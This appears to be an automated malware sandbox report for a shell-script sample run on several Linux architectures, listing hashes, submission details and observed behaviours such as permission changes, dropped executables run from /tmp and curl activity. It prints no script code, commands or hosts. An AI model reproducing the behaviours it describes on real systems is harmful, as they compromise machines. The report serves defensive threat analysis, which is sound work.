Analysis
-
max time kernel
150s
-
max time network
154s
-
platform
debian-9_mips
-
resource
debian9-mipsbe-20240611-en
-
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
-
submitted
28/10/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
-
Size
10KB
-
MD5
d8ec12ed2845ad2e0438b2877c6b582d
-
SHA1
a3ac76cc85f6efe3ee7d9dc250c3167a1316c3b3
-
SHA256
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24
-
SHA512
459b2e4080a48df3a9e1bcb0b60ca4c80cc2c0b477289a9db6ac26410638c43ecc9c345277a59f191be55b9b37bf113d558d4d1bc8316777707737d80b280d96
-
SSDEEP
192:P/TslVfHcsv+SU0iyP8okBODl/V1aBVpqcsv+So/TslVNiyP8okrzV1aBV2:P/TslVfHcsv+SU0iyP8oYODlmqcsv+Sg
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 26 IoCs
-
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
-
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97